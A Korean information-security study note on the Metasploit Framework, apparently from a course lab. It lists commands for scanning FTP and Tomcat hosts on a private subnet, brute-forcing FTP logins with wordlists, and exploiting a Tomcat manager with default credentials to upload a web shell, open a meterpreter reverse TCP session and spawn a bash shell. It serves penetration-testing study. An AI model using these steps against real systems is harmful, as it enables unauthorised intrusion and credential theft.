정보보안 스터디 - 16주차 2일 - MSF 모의해킹 도구

☞ metasploit-framework

메타스플로잇 프레임워크를 통한 스캔과 exploit 취약점 공격입니다.

사실 nmap에서 대부분 할 수 있는 기능이고 심지어 더 빠르게 가능하지만 이런 방법도 있다 수준만 봐주면 될 것 같습니다.

 

msfdb는 한 번 스캔이나 공격했던 내용을 캐시처럼 postgreSQL에 저장해두고 다음에 사용할 때 불러서 사용하는 방식입니다.

 

msfconsole -q를 통해 배너없이 빠르게 실행시킵니다.

 

ls -l /usr/share/metasploit-framework/modules/auxiliary/scanner/  에 관련 스크립트코드가 있습니다. 오픈 소스이기 때문에 ruby언어로 제작된 프로그램들이 저장되어 있으며 cat으로 확인 가능합니다.

auxiliary 는 공격도구 보조입니다. 스캔이나 DOS 소스코드, 무차별 대입공격 등의 예시가 있습니다.  

post 는 악성 쉘코드 이며

exploit은 취약점을 이용한 공격입니다. 운영체제, 네트워크, 악성코드 제작 등이 있습니다.

 

 

☞ scanner

nmap ftp 서버 열려있는지,

tomcat 서버 열려있는지 확인합니다.

search ftp_version
search tomcat_version
show options
set threads 16
set rhosts 192.168.20.0/24
run 또는 exploit

 

와이어샤크를 통해 패킷을 분석해보면

nmap 과 같은 syn요청을 보내 포트가 오픈되어있는지 확인합니다.

하지만 속도가 느려 권장되지 않습니다.

 

 

무차별 대입 공격 brute force 또는 사전 대입 공격이 가능합니다.

사전 파일이 테스트용으로 있지만 관리자 비밀번호는 일부러 귀찮아서 쉽게 설정하기 때문에 admin, tomcat, root 등 들어갈법한 사전을 임의로 만들어서 셋업하면 효과가 분명 있어 보입니다.

 

search ftp_login
show options 
set user_file /root/wordlist/user.list
set pass_file /root/wordlist/pass.list
또는 
set userpass /root/wordlist/userpass.list
로 유저와 패스워드를 한번에 대입 공격합니다.

 

그 외로도 smb 취약점 스캔이 가능합니다.

 

 

 

☞ exploit

search reverse tcp

use exploit/~~/reverse_tcp

 

자동으로 기본 페이로드가 선택이 됩니다.

show payloads
set payload ~로 meterpreter reverse_tcp 또는 바로 쉘을 실행할지 선택을 할 수 있습니다.
show options
set threads 16
set rhosts 192.168.20.204
set rports 8180(임의지정)
set httpusername tomcat
set httppassword tomcat

tomcat(JSP) 웹 서버에 관리자로 업로드가 가능하기 때문에 스캐너를 통해 관리자 계정 정보를 알아냈다면 웹쉘을 업로드할 수가 있습니다.

lhost, lport를 설정하여 리슨을 먼저 만들어둡니다.

reverse tcp 연결이기 때문에 일단 스크립트 코드를 업로드 하고, TCP Syn연결을 요청합니다.

그러면 서로 연결이 되고 

sysinfo
shell

로 웹쉘을 사용할 수 있게 됩니다.

id
whoami
python -c 'import pty;pty.spawn("/bin/bash")'

bash 쉘을 하나 만듭니다.

 

 

 

msf 안에서도 nmap이 가능한데 일반적으로말고

db_nmap 로 스캔을 진행하면 db에 저장이 되어

hosts, services 로 해당 스캔 정보를 확인할 수 있습니다.

db_import /root/nmapscan/windows7.xml 로 외부 스캔파일을 불러올 수 있습니다.

msfdb_reinit db에 있는 정보를 초기화합니다.